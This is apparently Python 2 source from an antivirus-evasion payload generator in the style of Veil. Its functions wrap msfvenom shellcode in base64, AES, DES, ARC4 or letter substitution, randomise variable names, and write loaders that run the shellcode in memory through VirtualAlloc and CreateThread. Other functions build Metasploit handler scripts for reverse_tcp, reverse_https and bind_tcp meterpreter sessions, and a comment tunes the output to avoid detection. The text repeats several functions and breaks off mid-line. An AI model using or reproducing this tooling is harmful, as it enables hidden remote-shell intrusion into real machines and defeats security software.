def pyVirtualAlloc():
# Generate Shellcode Using msfvenom
Shellcode = shellcode.genShellcode()
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
# Create Payload File
PayloadFile = open('payload.py', 'w')
PayloadFile.write('#!/usr/bin/python\n\n')
PayloadFile.write('import ctypes\n\n')
PayloadFile.write(ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n\n')
PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n')
PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n')
PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')
PayloadFile.close()
# Create Supporting Files and Print Exit Message
supportfiles.supportingFiles()
messages.endmsg()
def pyb64VAlloc():
# Generate Shellcode Using msfvenom
Shellcode = shellcode.genShellcode()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
RandT = randomizer.randomString()
# Create Payload File
PayloadFile = open('payload.py', 'w')
PayloadFile.write('#!/usr/bin/python\n\n')
PayloadFile.write('import ctypes\n')
PayloadFile.write('import base64\n\n')
PayloadFile.write(RandT + " = \"" + EncodedShellcode + "\"\n")
PayloadFile.write(ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n")
PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n')
PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n')
PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')
PayloadFile.close()
# Create Supporting Files and Print Exit Message
supportfiles.supportingFiles()
messages.endmsg()
def pyAESVAlloc():
# Generate Shellcode Using msfvenom
Shellcode = shellcode.genShellcode()
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
RandDecodeAES = randomizer.randomString()
RandCipherObject = randomizer.randomString()
RandDecodedShellcode = randomizer.randomString()
RandShellCode = randomizer.randomString()
RandPadding = randomizer.randomString()
# Set AES Block Size and Padding
BlockSize = 32
Padding = '{'
# Function for Padding Encrypted Text to Fit the Block
pad = lambda s: s + (BlockSize - len(s) % BlockSize) * Padding
# Encrypt & Encode or Decrypt & Decode a String
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(Padding)
# Generate Random AES Key
secret = aes.aesKey()
# Create Cipher Object with Generated Secret Key
cipher = AES.new(secret)
# Encrypt the String
EncodedShellcode = EncodeAES(cipher, Shellcode)
# Create Payload File
PayloadFile = open('payload.py', 'w')
PayloadFile.write('#!/usr/bin/python\n\n')
PayloadFile.write('import ctypes\n')
PayloadFile.write('from Crypto.Cipher import AES\n')
PayloadFile.write('import base64\n')
PayloadFile.write('import os\n\n')
PayloadFile.write(RandPadding + ' = \'{\'\n')
PayloadFile.write(RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n')
PayloadFile.write(RandCipherObject + ' = AES.new(\'' + secret + '\')\n')
PayloadFile.write(RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n')
PayloadFile.write(RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n\n')
PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n\n')
PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n\n')
PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')
PayloadFile.close()
# Create Supporting Files and Print Exit Message
supportfiles.supportingFiles()
messages.endmsg()
def pyLetterSubVAlloc():
# Generate Shellcode Using msfvenom
Shellcode = shellcode.genShellcode()
# Generate Random Variable Names
SubbedShellcodeVariableName = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
RandDecodedLetter = randomizer.randomString()
RandCorrectLetter = randomizer.randomString()
RandSubScheme = randomizer.randomString()
# Letter Substitution Variables
EncodeWithThis = "c"
DecodeWithThis = "t"
# Create Letter Substitution Scheme
SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis)
# Escaping Shellcode
Shellcode = Shellcode.encode("string_escape")
# Create Payload File
PayloadFile = open('payload.py', 'w')
PayloadFile.write('#!/usr/bin/python\n\n')
PayloadFile.write('import ctypes\n')
PayloadFile.write('from string import maketrans\n\n')
PayloadFile.write(RandDecodedLetter + ' = "t"\n')
PayloadFile.write(RandCorrectLetter + ' = "c"\n\n')
PayloadFile.write(RandSubScheme + ' = maketrans('+ RandDecodedLetter +', '+ RandCorrectLetter + ')\n\n')
PayloadFile.write(SubbedShellcodeVariableName + ' = \"'+ Shellcode.translate(SubScheme) +'\"\n\n')
PayloadFile.write(SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n')
PayloadFile.write(ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n\n')
PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n')
PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n')
PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')
PayloadFile.close()
# Create Supporting Files and Print Exit Message
supportfiles.supportingFiles()
messages.endmsg()
def pyDESVAlloc():
# Generate Shellcode Using msfvenom
Shellcode = shellcode.genShellcode()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandDESKey = randomizer.randomString()
RandDESPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
# Set IV Value and DES Key
iv = ''.join(random.choice(string.ascii_letters) for x in range(8))
DESKey = ''.join(random.choice(string.ascii_letters + string.digits) for x in range(8))
# Create DES Object and encrypt our payload
desmain = DES.new(DESKey, DES.MODE_CFB, iv)
EncShellCode = desmain.encrypt(Shellcode)
# Create Payload File
PayloadFile = open('payload.py', 'w')
PayloadFile.write('#!/usr/bin/python\n\n')
PayloadFile.write('from Crypto.Cipher import DES\n')
PayloadFile.write('import ctypes\n\n')
PayloadFile.write(RandIV + ' = \'' + iv + '\'\n')
PayloadFile.write(RandDESKey + ' = \'' + DESKey + '\'\n')
PayloadFile.write(RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n\n')
PayloadFile.write(RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n\n')
PayloadFile.write(ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n')
PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n')
PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n')
PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')
PayloadFile.close()
# Create Supporting Files and Print Exit Message
supportfiles.supportingFiles()
messages.endmsg()
def pyARCVAlloc():
# Generate Shellcode Using msfvenom
Shellcode = shellcode.genShellcode()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandARCKey = randomizer.randomString()
RandARCPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
# Set IV Value and DES Key
iv = ''.join(random.choice(string.ascii_letters) for x in range(8))
ARCKey = ''.join(random.choice(string.ascii_letters + string.digits) for x in range(8))
# Create DES Object and encrypt our payload
arc4main = ARC4.new(ARCKey)
EncShellCode = arc4main.encrypt(Shellcode)
# Create Payload File
PayloadFile = open('payload.py', 'w')
PayloadFile.write('#!/usr/bin/python\n\n')
PayloadFile.write('from Crypto.Cipher import ARC4\n')
PayloadFile.write('import ctypes\n\n')
PayloadFile.write(RandIV + ' = \'' + iv + '\'\n')
PayloadFile.write(RandARCKey + ' = \'' + ARCKey + '\'\n')
PayloadFile.write(RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n\n')
PayloadFile.write(RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n\n')
PayloadFile.write(ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n')
PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n')
PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n')
PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')
PayloadFile.close()
# Create Supporting Files and Print Exit Message
supportfiles.supportingFiles()
messages.endmsg()
def pyvoidpointer():
# Generate Shellcode Using msfvenom
Shellcode = shellcode.genShellcode()
# Generate Random Variable Names
RandShellcode = randomizer.randomString()
RandReverseShell = randomizer.randomString()
RandMemoryShell = randomizer.randomString()
# Create Payload File
PayloadFile = open("payload.py", "w")
PayloadFile.write("#!/usr/bin/python\n\n")
PayloadFile.write("from ctypes import *\n\n")
PayloadFile.write(RandReverseShell + ' = "' + Shellcode + '"\n')
PayloadFile.write(
RandMemoryShell + " = create_string_buffer(" + RandReverseShell + ", len(" + RandReverseShell + "))\n"
)
PayloadFile.write(RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n")
PayloadFile.write(RandShellcode + "()")
PayloadFile.close()
# Create Supporting Files and Print Exit Message
supportfiles.supportingFiles()
messages.endmsg()
def pyvoidpointer():
# Generate Shellcode Using msfvenom
Shellcode = shellcode.genShellcode()
# Generate Random Variable Names
RandShellcode = randomizer.randomString()
RandReverseShell = randomizer.randomString()
RandMemoryShell = randomizer.randomString()
# Create Payload File
PayloadFile = open('payload.py', 'w')
PayloadFile.write('#!/usr/bin/python\n\n')
PayloadFile.write('from ctypes import *\n\n')
PayloadFile.write(RandReverseShell + ' = \"' + Shellcode + '\"\n')
PayloadFile.write(RandMemoryShell + ' = create_string_buffer(' +
RandReverseShell + ', len(' + RandReverseShell + '))\n')
PayloadFile.write(RandShellcode + ' = cast(' + RandMemoryShell +
', CFUNCTYPE(c_void_p))\n')
PayloadFile.write(RandShellcode + '()')
PayloadFile.close()
# Create Supporting Files and Print Exit Message
supportfiles.supportingFiles()
messages.endmsg()
def OutputMenu(self,
payload,
code,
showTitle=True,
interactive=True,
OutputBaseChoice=""):
"""
Write a chunk of payload code to a specified ouput file base.
Also outputs a handler script if required from the options.
code = the source code to write
OutputBaseChoice = "payload" or user specified string
Returns the full name the source was written to.
"""
# if we get .exe code back, output to the compiled folder, otherwise write to the source folder
if payload.extension == "exe":
outputFolder = settings.PAYLOAD_COMPILED_PATH
else:
outputFolder = settings.PAYLOAD_SOURCE_PATH
# only show get input if we're doing the interactive menu
if interactive:
if showTitle:
messages.title()
# Get the base install name for the payloads (i.e. OutputBaseChoice.py/OutputBaseChoice.exe)
print " [*] Press [enter] for 'payload'"
OutputBaseChoice = raw_input(
" [>] Please enter the base name for output files: ")
if OutputBaseChoice == "": OutputBaseChoice = "payload"
# walk the output path and grab all the file bases, disregarding extensions
fileBases = []
for (dirpath, dirnames, filenames) in os.walk(outputFolder):
fileBases.extend(
list(
set([
x.split(".")[0] for x in filenames
if x.split(".")[0] != ''
])))
break
# as long as the file exists, increment a counter to add to the filename
# i.e. "payload3.py", to make sure we don't overwrite anything
FinalBaseChoice = OutputBaseChoice
x = 1
while FinalBaseChoice in fileBases:
FinalBaseChoice = OutputBaseChoice + str(x)
x += 1
# set the output name to /outout/source/BASENAME.EXT
OutputFileName = outputFolder + FinalBaseChoice + "." + payload.extension
OutputFile = open(OutputFileName, 'w')
OutputFile.write(code)
OutputFile.close()
# start building the information string for the generated payload
message = "\n Language:\t\t" + helpers.color(
payload.language) + "\n Payload:\t\t" + payload.shortname
if hasattr(payload, 'shellcode'):
# check if msfvenom was used or something custom, print appropriately
if payload.shellcode.customshellcode != "":
message += "\n Shellcode:\t\tcustom"
else:
message += "\n Shellcode:\t\t" + payload.shellcode.msfvenompayload
# if the shellcode wasn't custom, build out a handler script
handler = "use exploit/multi/handler\n"
handler += "set PAYLOAD " + payload.shellcode.msfvenompayload + "\n"
handler += "set LHOST 0.0.0.0\n"
# extract LPORT if it's there
p = re.compile('LPORT=(.*?) ')
parts = p.findall(payload.shellcode.msfvenomCommand)
if len(parts) > 0:
handler += "set LPORT " + parts[0] + "\n"
handler += "set ExitOnSession false\n"
handler += "set AutoRunScript post/windows/manage/migrate\n"
handler += "exploit -j\n"
# print out any msfvenom options we used in shellcode generation if specified
if len(payload.shellcode.options) > 0:
message += "\n Options:\t\t"
parts = ""
for option in payload.shellcode.options:
parts += ' ' + option + ' '
message += parts.strip()
# reset the internal shellcode state the options don't persist
payload.shellcode.Reset()
# if required options were specified, output them
if hasattr(payload, 'required_options'):
message += "\n Required Options:\t"
t = ""
# sort the dictionary by key before we output, so it looks nice
for key in sorted(payload.required_options.iterkeys()):
t += " " + key + "=" + payload.required_options[key][0] + " "
message += t.strip()
# check if any options specify that we should build a handler out
keys = payload.required_options.keys()
if "LHOST" in keys:
handler = "use exploit/multi/handler\n"
# do our best to determine the payload type
# handle options from the backdoor factory
if "payload" in keys:
p = payload.required_options["payload"][0]
if "tcp" in p:
handler += "set PAYLOAD windows/meterpreter/reverse_tcp\n"
elif "https" in p:
handler += "set PAYLOAD windows/meterpreter/reverse_https\n"
elif "shell" in p:
handler += "set PAYLOAD windows/shell_reverse_tcp\n"
else:
pass
# if not BDF, try to extract the handler type from the payload name
else:
if "tcp" in payload.shortname.lower():
handler += "set PAYLOAD windows/meterpreter/reverse_tcp\n"
elif "https" in payload.shortname.lower():
handler += "set PAYLOAD windows/meterpreter/reverse_https\n"
elif "http" in payload.shortname.lower():
handler += "set PAYLOAD windows/meterpreter/reverse_https\n"
else:
pass
handler += "set LHOST 0.0.0.0\n"
if "LPORT" in keys:
handler += "set LPORT " + payload.required_options[
"LPORT"][0] + "\n"
handler += "set ExitOnSession false\n"
handler += "set AutoRunScript post/windows/manage/migrate\n"
handler += "exploit -j\n"
message += "\n Payload File:\t\t" + OutputFileName + "\n"
# if we're generating the handler script, write it out
try:
if settings.GENERATE_HANDLER_SCRIPT.lower() == "true":
handlerFileName = settings.HANDLER_PATH + FinalBaseChoice + "_handler.rc"
handlerFile = open(handlerFileName, 'w')
handlerFile.write(handler)
handlerFile.close()
message += " Handler File:\t\t" + handlerFileName + "\n"
except:
# is that option fails, it probably means that the /etc/veil/settings.py file hasn't been updated
print helpers.color("\n [!] Please run ./config/update.py !",
warning=True)
# print out notes if set
if hasattr(payload, 'notes'):
#message += " Notes:\t\t\t" + payload.notes
message += helpers.formatLong("Notes:",
payload.notes,
frontTab=False,
spacing=24)
message += "\n"
# check if compile_to_exe is in the required options, if so,
# call supportfiles.supportingFiles() to compile appropriately
if hasattr(self.payload, 'required_options'):
if "compile_to_exe" in self.payload.required_options:
value = self.payload.required_options['compile_to_exe'][
0].lower()[0]
if value == "y" or value == True:
if interactive:
supportfiles.supportingFiles(self.payload.language,
OutputFileName, {})
else:
supportfiles.supportingFiles(self.payload.language,
OutputFileName,
{'method': 'pyinstaller'})
# if we're compiling, set the returned file name to the output .exe
# so we can return this for external calls to the framework
OutputFileName = settings.PAYLOAD_COMPILED_PATH + FinalBaseChoice + ".exe"
# print the full message containing generation notes
print message
# print the end message
messages.endmsg()
if interactive:
raw_input(" [>] press any key to return to the main menu: ")
#self.MainMenu(showMessage=True)
return OutputFileName
def OutputMenu(self,
payload,
code,
showTitle=True,
interactive=True,
args=None):
"""
Write a chunk of payload code to a specified ouput file base.
Also outputs a handler script if required from the options.
code = the source code to write
OutputBaseChoice = "payload" or user specified string
Returns the full name the source was written to.
"""
OutputBaseChoice = ""
overwrite = False
# if we have arguments passed, extract out the values we want
if args:
OutputBaseChoice = args.o
overwrite = args.overwrite
# if we get .exe or ELF (with no base) code back, output to the compiled folder, otherwise write to the source folder
if payload.extension == "exe" or payload.extension == "war":
outputFolder = settings.PAYLOAD_COMPILED_PATH
# Check for ELF binary
elif hasattr(payload, 'type') and payload.type == "ELF":
outputFolder = settings.PAYLOAD_COMPILED_PATH
else:
outputFolder = settings.PAYLOAD_SOURCE_PATH
# only show get input if we're doing the interactive menu
if interactive:
if showTitle:
if settings.TERMINAL_CLEAR != "false": messages.title()
# Get the base install name for the payloads (i.e. OutputBaseChoice.py/OutputBaseChoice.exe)
OutputBaseChoice = raw_input(
"\n [>] Please enter the base name for output files (default is 'payload'): "
)
# ensure we get a base name and not a full path
while OutputBaseChoice != "" and "/" in OutputBaseChoice:
print helpers.color(
" [!] Please provide a base name, not a path, for the output base",
warning=True)
OutputBaseChoice = raw_input(
"\n [>] Please enter the base name for output files (default is 'payload'): "
)
# for invalid output base choices that are passed by arguments
else:
if "/" in OutputBaseChoice:
print helpers.color(
" [!] Please provide a base name, not a path, for the output base",
warning=True)
print helpers.color(
" [!] Defaulting to 'payload' for output base...",
warning=True)
OutputBaseChoice = "payload"
if OutputBaseChoice == "": OutputBaseChoice = "payload"
# if we are overwriting, this is the base choice used
FinalBaseChoice = OutputBaseChoice
# if we're not overwriting output files, walk the existing and increment
if not overwrite:
# walk the output path and grab all the file bases, disregarding extensions
fileBases = []
for (dirpath, dirnames, filenames) in os.walk(outputFolder):
fileBases.extend(
list(
set([
x.split(".")[0] for x in filenames
if x.split(".")[0] != ''
])))
break
# as long as the file exists, increment a counter to add to the filename
# i.e. "payload3.py", to make sure we don't overwrite anything
FinalBaseChoice = OutputBaseChoice
x = 1
while FinalBaseChoice in fileBases:
FinalBaseChoice = OutputBaseChoice + str(x)
x += 1
# set the output name to /outout/source/BASENAME.EXT unless it is an ELF then no extension
if hasattr(payload, 'type') and payload.type == "ELF":
OutputFileName = outputFolder + FinalBaseChoice + payload.extension
else:
OutputFileName = outputFolder + FinalBaseChoice + "." + payload.extension
OutputFile = open(OutputFileName, 'w')
OutputFile.write(code)
OutputFile.close()
# start building the information string for the generated payload
# extract the payload class name from the instantiated object, then chop off the load folder prefix
payloadname = "/".join(
str(
str(payload.__class__)
[str(payload.__class__).find("payloads"):]).split(".")
[0].split("/")[1:])
message = "\n Language:\t\t" + helpers.color(
payload.language) + "\n Payload:\t\t" + payloadname
handler = ""
if hasattr(payload, 'shellcode'):
# check if msfvenom was used or something custom, print appropriately
if payload.shellcode.customshellcode != "":
message += "\n Shellcode:\t\tcustom"
else:
message += "\n Shellcode:\t\t" + payload.shellcode.msfvenompayload
# if the shellcode wasn't custom, build out a handler script
handler = "use exploit/multi/handler\n"
handler += "set PAYLOAD " + payload.shellcode.msfvenompayload + "\n"
# extract LHOST if it's there
p = re.compile('LHOST=(.*?) ')
parts = p.findall(payload.shellcode.msfvenomCommand)
if len(parts) > 0:
handler += "set LHOST " + parts[0] + "\n"
else:
# try to extract this local IP
handler += "set LHOST " + helpers.LHOST() + "\n"
# extract LPORT if it's there
p = re.compile('LPORT=(.*?) ')
parts = p.findall(payload.shellcode.msfvenomCommand)
if len(parts) > 0:
handler += "set LPORT " + parts[0] + "\n"
# Removed autoscript smart migrate due to users on forum saying that migrate itself caused detection
# in an otherwise undetectable (at the time) payload
handler += "set ExitOnSession false\n"
handler += "exploit -j\n"
# print out any msfvenom options we used in shellcode generation if specified
if len(payload.shellcode.options) > 0:
message += "\n Options:\t\t"
parts = ""
for option in payload.shellcode.options:
parts += ' ' + option + ' '
message += parts.strip()
# reset the internal shellcode state the options don't persist
payload.shellcode.Reset()
# if required options were specified, output them
if hasattr(payload, 'required_options'):
t = ""
# sort the dictionary by key before we output, so it looks nice
for key in sorted(payload.required_options.iterkeys()):
t += " " + key + "=" + payload.required_options[key][0] + " "
message += "\n" + helpers.formatLong(
"Required Options:", t.strip(), frontTab=False, spacing=24)
# check if any options specify that we should build a handler out
keys = payload.required_options.keys()
# assuming if LHOST is set, we need a handler script
if "LHOST" in keys or "RHOST" in keys:
handler = "use exploit/multi/handler\n"
# do our best to determine the payload type
architecture = ""
if hasattr(payload,
"architecture") and payload.architecture == "64":
architecture = "x64/"
# handle options from the backdoor factory
if "payload" in keys:
p = payload.required_options["payload"][0]
if "rev_tcp" in p:
handler += "set PAYLOAD windows/%smeterpreter/reverse_tcp\n" % architecture
elif "bind_tcp" in p:
handler += "set PAYLOAD windows/%smeterpreter/bind_tcp\n" % architecture
elif "https" in p:
handler += "set PAYLOAD windows/%smeterpreter/reverse_https\n" % architecture
elif "shell" in p:
handler += "set PAYLOAD windows/%sshell_reverse_tcp\n" % architecture
else:
pass
# if not BDF, try to extract the handler type from the payload name
else:
# extract the payload class name from the instantiated object, then chop off the load folder prefix
payloadname = "/".join(
str(
str(payload.__class__)
[str(payload.__class__).find("payloads"):]).split(
".")[0].split("/")[1:])
# pure rev_tcp stager
if "rev_tcp" in payloadname.lower():
handler += "set PAYLOAD windows/%smeterpreter/reverse_tcp\n" % architecture
# pure bind_tcp stager
elif "bind_tcp" in payloadname.lower():
handler += "set PAYLOAD windows/%smeterpreter/bind_tcp\n" % architecture
# pure rev_https stager
elif "https" in payloadname.lower():
handler += "set PAYLOAD windows/%smeterpreter/reverse_https\n" % architecture
# pure rev_http stager
elif "http" in payloadname.lower():
handler += "set PAYLOAD windows/%smeterpreter/reverse_http\n" % architecture
else:
pass
# grab the LHOST value
if "LHOST" in keys:
handler += "set LHOST " + payload.required_options[
"LHOST"][0] + "\n"
if "RHOST" in keys:
handler += "set RHOST " + payload.required_options[
"RHOST"][0] + "\n"
# grab the LPORT value if it was set
if "LPORT" in keys:
handler += "set LPORT " + payload.required_options[
"LPORT"][0] + "\n"
handler += "set ExitOnSession false\n"
handler += "exploit -j\n"
message += "\n Payload File:\t\t" + OutputFileName + "\n"
# if we're generating the handler script, write it out
try:
if settings.GENERATE_HANDLER_SCRIPT.lower() == "true":
if handler != "":
handlerFileName = settings.HANDLER_PATH + FinalBaseChoice + "_handler.rc"
handlerFile = open(handlerFileName, 'w')
handlerFile.write(handler)
handlerFile.close()
message += " Handler File:\t\t" + handlerFileName + "\n"
except:
# is that option fails, it probably means that the /etc/veil/settings.py file hasn't been updated
print helpers.color(
"\n [!] Internal error #1. Please run %s manually\n" %
(os.path.abspath("./config/update.py")),
warning=True)
# print out notes if set
if hasattr(payload, 'notes'):
#message += " Notes:\t\t\t" + payload.notes
message += helpers.formatLong("Notes:",
payload.notes,
frontTab=False,
spacing=24)
# check if compile_to_exe is in the required options, if so,
# call supportfiles.supportingFiles() to compile appropriately
if hasattr(self.payload, 'required_options'
) and self.payload.language.lower() != "powershell":
if "COMPILE_TO_EXE" in self.payload.required_options:
value = self.payload.required_options['COMPILE_TO_EXE'][
0].lower()[0]
if value == "y" or value == True:
# check if the --pwnstaller flag was passed
if args and args.pwnstaller:
supportfiles.supportingFiles(self.payload,
OutputFileName,
{'method': 'pwnstaller'})
else:
# if interactive, allow the user to choose the method
if interactive:
supportfiles.supportingFiles(
self.payload, OutputFileName, {})
# otherwise specify the default, pyinstaller
else:
supportfiles.supportingFiles(
self.payload, OutputFileName,
{'method': 'pyinstaller'})
# if we're compiling, set the returned file name to the output .exe
# so we can return this for external calls to the framework
OutputFileName = settings.PAYLOAD_COMPILED_PATH + FinalBaseChoice + ".exe"
# This block of code is going to be used to SHA1 hash our compiled payloads to potentially submit the
# hash with VTNotify to detect if it's been flagged
try:
CompiledHashFile = settings.HASH_LIST
HashFile = open(CompiledHashFile, 'a')
OutputFile = open(OutputFileName, 'rb')
Sha1Hasher = hashlib.sha1()
Sha1Hasher.update(OutputFile.read())
SHA1Hash = Sha1Hasher.hexdigest()
OutputFile.close()
HashFile.write(SHA1Hash + ":" + FinalBaseChoice + "\n")
HashFile.close()
# print the full message containing generation notes
print message
# print the end message
messages.endmsg()
except:
# if that option fails, it probably means that the /etc/veil/settings.py file hasn't been updated
print helpers.color(
"\n [!] Internal error #2. Unable to generate output. Please run %s manually\n"
% (os.path.abspath("./config/update.py")),
warning=True)
if interactive:
raw_input(" [>] Press any key to return to the main menu.")
print ""
self.MainMenu(showMessage=True)
return OutputFileName
def pyLetterSubVAlloc():
# Generate Shellcode Using msfvenom
Shellcode = shellcode.genShellcode()
# Generate Random Variable Names
SubbedShellcodeVariableName = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
RandDecodedLetter = randomizer.randomString()
RandCorrectLetter = randomizer.randomString()
RandSubScheme = randomizer.randomString()
# Letter Substitution Variables
EncodeWithThis = "c"
DecodeWithThis = "t"
# Create Letter Substitution Scheme
SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis)
# Escaping Shellcode
Shellcode = Shellcode.encode("string_escape")
# Create Payload File
PayloadFile = open('payload.py', 'w')
PayloadFile.write('#!/usr/bin/python\n\n')
PayloadFile.write('import ctypes\n')
PayloadFile.write('from string import maketrans\n\n')
PayloadFile.write(RandDecodedLetter + ' = "t"\n')
PayloadFile.write(RandCorrectLetter + ' = "c"\n\n')
PayloadFile.write(RandSubScheme + ' = maketrans(' + RandDecodedLetter +
